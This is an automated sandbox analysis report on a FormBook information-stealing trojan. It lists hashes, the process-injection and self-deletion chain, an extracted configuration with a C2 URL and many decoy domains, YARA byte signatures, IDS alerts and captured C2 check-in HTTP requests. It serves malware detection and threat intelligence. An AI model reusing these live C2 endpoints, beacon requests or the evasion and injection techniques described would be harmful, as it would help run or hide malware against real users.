Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Windows Analysis Report nji3Lg1ot6

Overview

General Information

Sample Name:nji3Lg1ot6 (renamed file extension from none to exe)
Analysis ID:552997
MD5:8eddcc35719034649f6947b2b08bcdf3
SHA1:5506b69b4584f43232f45299192a540ec0197998
SHA256:0d072a60b433f330d2ba97d75eae7af07e9d75bc6ed5b1065287661d05e82ab6
Tags:32exetrojan
Infos:

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
System process connects to network (likely due to code injection or exploit)
Sample uses process hollowing technique
Maps a DLL or memory area into another process
Machine Learning detection for sample
Modifies the prolog of user mode functions (user mode inline hooks)
Self deletion via cmd delete
Injects a PE file into a foreign processes
Queues an APC in another process (thread injection)
Tries to detect virtualization through RDTSC time measurements
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Uses 32bit PE files
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Contains functionality to shutdown / reboot the system
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Enables debug privileges
Sample file is different than original file name gathered from version info
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Checks if the current process is being debugged
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality for read data from the clipboard

Classification

Process Tree

  • System is w10x64
  • nji3Lg1ot6.exe (PID: 5092 cmdline: "C:\Users\user\Desktop\nji3Lg1ot6.exe" MD5: 8EDDCC35719034649F6947B2B08BCDF3)
    • nji3Lg1ot6.exe (PID: 6920 cmdline: "C:\Users\user\Desktop\nji3Lg1ot6.exe" MD5: 8EDDCC35719034649F6947B2B08BCDF3)
      • explorer.exe (PID: 3352 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • autochk.exe (PID: 6480 cmdline: C:\Windows\SysWOW64\autochk.exe MD5: 34236DB574405291498BCD13D20C42EB)
        • msiexec.exe (PID: 1304 cmdline: C:\Windows\SysWOW64\msiexec.exe MD5: 12C17B5A5C2A7B97342C362CA467E9A2)
          • cmd.exe (PID: 7156 cmdline: /c del "C:\Users\user\Desktop\nji3Lg1ot6.exe" MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 5352 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.rthearts.com/nk6l/"], "decoy": ["cbnextra.com", "entitysystemsinc.com", "55midwoodave.com", "ebelizzi.com", "khojcity.com", "1527brokenoakdrive.site", "housinghproperties.com", "ratiousa.com", "lrcrepresentacoes.net", "tocoec.net", "khadamatdemnate.com", "davidkastner.xyz", "gardeniaresort.com", "qiantangguoji.com", "visaprepaidprocessinq.com", "cristinamadara.com", "semapisus.xyz", "mpwebagency.net", "alibabasdeli.com", "gigasupplies.com", "quantumskillset.com", "eajui136.xyz", "patsanchezelpaso.com", "trined.mobi", "amaturz.info", "approveprvqsx.xyz", "fronterapost.house", "clairewashere.site", "xn--3jst70hg8f.com", "thursdaynightthriller.com", "primacykapjlt.xyz", "vaginette.site", "olitusd.com", "paypal-caseid521.com", "preose.xyz", "ferbsqlv28.club", "iffiliatefreedom.com", "okdahotel.com", "cochuzyan.xyz", "hotyachts.net", "diamond-beauties.com", "storyofsol.com", "xianshucai.net", "venusmedicalarts.com", "energiaorgonu.com", "savannah.biz", "poeticdaily.com", "wilddalmatian.com", "kdydkyqksqucyuyen.com", "meanmod.xyz", "kaka.digital", "viewcision.com", "wowzerbackupandrestore-us.com", "hydrogendatapower.com", "427521.com", "ponto-bras.space", "chevalsk.com", "hnftdl.com", "nanasyhogar.com", "createacarepack.com", "wildkraeuter-wochenende.com", "uchihomedeco.com", "quintongiang.com", "mnbvending.com"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000001.00000002.344927446.00000000009C0000.00000040.00020000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000001.00000002.344927446.00000000009C0000.00000040.00020000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x9b72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x156a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x15191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x157a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x1591f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0xa58a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x1440c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xb283:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x1b917:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1c91a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000001.00000002.344927446.00000000009C0000.00000040.00020000.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x18839:$sqlite3step: 68 34 1C 7B E1
    • 0x1894c:$sqlite3step: 68 34 1C 7B E1
    • 0x18868:$sqlite3text: 68 38 2A 90 C5
    • 0x1898d:$sqlite3text: 68 38 2A 90 C5
    • 0x1887b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x189a3:$sqlite3blob: 68 53 D8 7F 8C
    00000003.00000000.316886950.000000000FFA5000.00000040.00020000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000003.00000000.316886950.000000000FFA5000.00000040.00020000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x16a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x1191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x17a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x191f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0x40c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0x7917:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x891a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 31 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      1.0.nji3Lg1ot6.exe.400000.2.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        1.0.nji3Lg1ot6.exe.400000.2.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x9b72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x156a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x15191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x157a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x1591f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0xa58a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x1440c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0xb283:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x1b917:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1c91a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        1.0.nji3Lg1ot6.exe.400000.2.raw.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x18839:$sqlite3step: 68 34 1C 7B E1
        • 0x1894c:$sqlite3step: 68 34 1C 7B E1
        • 0x18868:$sqlite3text: 68 38 2A 90 C5
        • 0x1898d:$sqlite3text: 68 38 2A 90 C5
        • 0x1887b:$sqlite3blob: 68 53 D8 7F 8C
        • 0x189a3:$sqlite3blob: 68 53 D8 7F 8C
        1.2.nji3Lg1ot6.exe.400000.0.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          1.2.nji3Lg1ot6.exe.400000.0.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x8b08:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x8d72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x148a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x14391:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x149a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x14b1f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x978a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x1360c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xa483:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x1ab17:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1bb1a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 28 entries

          Sigma Overview

          No Sigma rule has matched

          Jbx Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Found malware configurationShow sources
          Source: 00000001.00000002.344927446.00000000009C0000.00000040.00020000.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.rthearts.com/nk6l/"], "decoy": ["cbnextra.com", "entitysystemsinc.com", "55midwoodave.com", "ebelizzi.com", "khojcity.com", "1527brokenoakdrive.site", "housinghproperties.com", "ratiousa.com", "lrcrepresentacoes.net", "tocoec.net", "khadamatdemnate.com", "davidkastner.xyz", "gardeniaresort.com", "qiantangguoji.com", "visaprepaidprocessinq.com", "cristinamadara.com", "semapisus.xyz", "mpwebagency.net", "alibabasdeli.com", "gigasupplies.com", "quantumskillset.com", "eajui136.xyz", "patsanchezelpaso.com", "trined.mobi", "amaturz.info", "approveprvqsx.xyz", "fronterapost.house", "clairewashere.site", "xn--3jst70hg8f.com", "thursdaynightthriller.com", "primacykapjlt.xyz", "vaginette.site", "olitusd.com", "paypal-caseid521.com", "preose.xyz", "ferbsqlv28.club", "iffiliatefreedom.com", "okdahotel.com", "cochuzyan.xyz", "hotyachts.net", "diamond-beauties.com", "storyofsol.com", "xianshucai.net", "venusmedicalarts.com", "energiaorgonu.com", "savannah.biz", "poeticdaily.com", "wilddalmatian.com", "kdydkyqksqucyuyen.com", "meanmod.xyz", "kaka.digital", "viewcision.com", "wowzerbackupandrestore-us.com", "hydrogendatapower.com", "427521.com", "ponto-bras.space", "chevalsk.com", "hnftdl.com", "nanasyhogar.com", "createacarepack.com", "wildkraeuter-wochenende.com", "uchihomedeco.com", "quintongiang.com", "mnbvending.com"]}
          Multi AV Scanner detection for submitted fileShow sources
          Source: nji3Lg1ot6.exeVirustotal: Detection: 37%Perma Link
          Source: nji3Lg1ot6.exeReversingLabs: Detection: 41%
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 1.0.nji3Lg1ot6.exe.400000.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.nji3Lg1ot6.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.1.nji3Lg1ot6.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.nji3Lg1ot6.exe.400000.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.nji3Lg1ot6.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.nji3Lg1ot6.exe.23e0000.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.nji3Lg1ot6.exe.400000.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.nji3Lg1ot6.exe.23e0000.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.nji3Lg1ot6.exe.400000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.1.nji3Lg1ot6.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.nji3Lg1ot6.exe.400000.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000001.00000002.344927446.00000000009C0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000000.316886950.000000000FFA5000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000000.292323567.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000000.333023210.000000000FFA5000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.345328799.0000000000D30000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.344714240.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000001.294869944.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.556861627.00000000006C0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.562054407.0000000002920000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.561888247.00000000028F0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.295727882.00000000023E0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000000.293866561.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Machine Learning detection for sampleShow sources
          Source: nji3Lg1ot6.exeJoe Sandbox ML: detected
          Source: 7.2.msiexec.exe.4baf840.4.unpackAvira: Label: TR/Patched.Ren.Gen
          Source: 7.2.msiexec.exe.2c5b358.1.unpackAvira: Label: TR/Patched.Ren.Gen
          Source: 1.2.nji3Lg1ot6.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 1.1.nji3Lg1ot6.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 1.0.nji3Lg1ot6.exe.400000.3.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 0.2.nji3Lg1ot6.exe.23e0000.3.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 1.0.nji3Lg1ot6.exe.400000.2.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 1.0.nji3Lg1ot6.exe.400000.1.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: nji3Lg1ot6.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
          Source: Binary string: msiexec.pdb source: nji3Lg1ot6.exe, 00000001.00000002.345417642.0000000000EA0000.00000040.00020000.sdmp
          Source: Binary string: msiexec.pdbGCTL source: nji3Lg1ot6.exe, 00000001.00000002.345417642.0000000000EA0000.00000040.00020000.sdmp
          Source: Binary string: wntdll.pdbUGP source: nji3Lg1ot6.exe, 00000000.00000003.294014026.0000000003090000.00000004.00000001.sdmp, nji3Lg1ot6.exe, 00000000.00000003.290725743.0000000003220000.00000004.00000001.sdmp, nji3Lg1ot6.exe, 00000001.00000002.345001948.0000000000A00000.00000040.00000001.sdmp, nji3Lg1ot6.exe, 00000001.00000002.345127293.0000000000B1F000.00000040.00000001.sdmp, msiexec.exe, 00000007.00000002.562611430.0000000004680000.00000040.00000001.sdmp, msiexec.exe, 00000007.00000002.562834721.000000000479F000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: nji3Lg1ot6.exe, nji3Lg1ot6.exe, 00000001.00000002.345001948.0000000000A00000.00000040.00000001.sdmp, nji3Lg1ot6.exe, 00000001.00000002.345127293.0000000000B1F000.00000040.00000001.sdmp, msiexec.exe, msiexec.exe, 00000007.00000002.562611430.0000000004680000.00000040.00000001.sdmp, msiexec.exe, 00000007.00000002.562834721.000000000479F000.00000040.00000001.sdmp
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 0_2_00405D7C FindFirstFileA,FindClose,
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 0_2_004053AA CloseHandle,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 0_2_00402630 FindFirstFileA,

          Networking:

          barindex
          Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49819 -> 23.227.38.74:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49819 -> 23.227.38.74:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49819 -> 23.227.38.74:80
          System process connects to network (likely due to code injection or exploit)Show sources
          Source: C:\Windows\explorer.exeDomain query: www.alibabasdeli.com
          Source: C:\Windows\explorer.exeDomain query: www.nanasyhogar.com
          Source: C:\Windows\explorer.exeNetwork Connect: 172.67.173.57 80
          Source: C:\Windows\explorer.exeNetwork Connect: 23.227.38.74 80
          Source: C:\Windows\explorer.exeNetwork Connect: 50.31.177.38 80
          Source: C:\Windows\explorer.exeDomain query: www.gigasupplies.com
          C2 URLs / IPs found in malware configurationShow sources
          Source: Malware configuration extractorURLs: www.rthearts.com/nk6l/
          Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
          Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
          Source: global trafficHTTP traffic detected: GET /nk6l/?Mn6p=MMWPsHlVo7vbxfqT+E8iHGCJx4EpOMO7XTm/RW/7WjycdebsiPyF7OJFYt5Z76O5OpDL&m87=kDHx4bf HTTP/1.1Host: www.nanasyhogar.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /nk6l/?Mn6p=zX7TWLgUTNDtCnt/XwnHS79HNPNEveCsoMI9+/ObXOF7SG2tu7bFQ30QzdtJgFVEPE8r&m87=kDHx4bf HTTP/1.1Host: www.alibabasdeli.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /nk6l/?Mn6p=sMbkpEIYm7OVlcdzrpiwDTFtc4P6BDcndIa3bMJ3nzzEqPK8OVYh2AVyK3PkcpAP2wum&m87=kDHx4bf HTTP/1.1Host: www.gigasupplies.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewIP Address: 23.227.38.74 23.227.38.74
          Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 14 Jan 2022 02:39:09 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeVary: Accept-EncodingX-Sorting-Hat-PodId: 188X-Sorting-Hat-ShopId: 60258091197X-Dc: gcp-europe-west1X-Request-ID: 077675b5-2854-474a-9745-e2e99dc925ceX-Permitted-Cross-Domain-Policies: noneX-XSS-Protection: 1; mode=blockX-Download-Options: noopenX-Content-Type-Options: nosniffCF-Cache-Status: DYNAMICServer: cloudflareCF-RAY: 6cd37e035a694e0e-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400Data Raw: 31 34 31 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 66 65 72 72 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 65 76 65 72 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 41 63 63 65 73 73 20 64 65 6e 69 65 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 2a 7b 62 6f 78 2d 73 69 7a 69 6e 67 3a 62 6f 72 64 65 72 2d 62 6f 78 3b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 48 65 6c 76 65 74 69 63 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 31 46 31 46 31 3b 66 6f 6e 74 2d 73 69 7a 65 3a 36 32 2e 35 25 3b 63 6f 6c 6f 72 3a 23 33 30 33 30 33 30 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 7d 62 6f 64 79 7b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 3a 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 32 2e 37 72 65 6d 7d 61 7b 63 6f 6c 6f 72 3a 23 33 30 33 30 33 30 3b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 31 70 78 20 73 6f 6c 69 64 20 23 33 30 33 30 33 30 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 31 72 65 6d 3b 74 72 61 6e 73 69 74 69 6f 6e 3a 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 20 30 2e 32 73 20 65 61 73 65 2d 69 6e 7d 61 3a 68 6f 76 65 72 7b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 2d 63 6f 6c 6f 72 3a 23 41 39 41 39 41 39 7d 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 38 72 65 6d 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 3b 6d 61 72 67 69 6e 3a 30 20 30 20 31 2e 34 72 65 6d 20 30 7d 70 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 35 72 65 6d 3b 6d 61 72 67 69 6e 3a 30 7d 2e 70 61 67 65 7b 70 61 64 64 69 6e 67 3a 34 72 65 6d 20 33 2e 35 72 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 76 68 3b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 63 6f 6c Data Ascii: 141d<!DOCTYPE html><html lang="en"><head> <meta charset="utf-8" /> <meta name="referrer" content="never" /> <title>Access denied</title> <style type="text/css">
          Source: nji3Lg1ot6.exeString found in binary or memory: http://nsis.sf.net/NSIS_Error
          Source: nji3Lg1ot6.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
          Source: unknownDNS traffic detected: queries for: www.nanasyhogar.com
          Source: global trafficHTTP traffic detected: GET /nk6l/?Mn6p=MMWPsHlVo7vbxfqT+E8iHGCJx4EpOMO7XTm/RW/7WjycdebsiPyF7OJFYt5Z76O5OpDL&m87=kDHx4bf HTTP/1.1Host: www.nanasyhogar.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /nk6l/?Mn6p=zX7TWLgUTNDtCnt/XwnHS79HNPNEveCsoMI9+/ObXOF7SG2tu7bFQ30QzdtJgFVEPE8r&m87=kDHx4bf HTTP/1.1Host: www.alibabasdeli.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /nk6l/?Mn6p=sMbkpEIYm7OVlcdzrpiwDTFtc4P6BDcndIa3bMJ3nzzEqPK8OVYh2AVyK3PkcpAP2wum&m87=kDHx4bf HTTP/1.1Host: www.gigasupplies.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 0_2_00404F61 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,

          E-Banking Fraud:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 1.0.nji3Lg1ot6.exe.400000.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.nji3Lg1ot6.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.1.nji3Lg1ot6.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.nji3Lg1ot6.exe.400000.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.nji3Lg1ot6.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.nji3Lg1ot6.exe.23e0000.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.nji3Lg1ot6.exe.400000.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.nji3Lg1ot6.exe.23e0000.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.nji3Lg1ot6.exe.400000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.1.nji3Lg1ot6.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.nji3Lg1ot6.exe.400000.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000001.00000002.344927446.00000000009C0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000000.316886950.000000000FFA5000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000000.292323567.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000000.333023210.000000000FFA5000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.345328799.0000000000D30000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.344714240.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000001.294869944.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.556861627.00000000006C0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.562054407.0000000002920000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.561888247.00000000028F0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.295727882.00000000023E0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000000.293866561.0000000000400000.00000040.00000001.sdmp, type: MEMORY

          System Summary:

          barindex
          Malicious sample detected (through community Yara rule)Show sources
          Source: 1.0.nji3Lg1ot6.exe.400000.2.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.0.nji3Lg1ot6.exe.400000.2.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.2.nji3Lg1ot6.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.2.nji3Lg1ot6.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.1.nji3Lg1ot6.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.1.nji3Lg1ot6.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.0.nji3Lg1ot6.exe.400000.3.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.0.nji3Lg1ot6.exe.400000.3.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
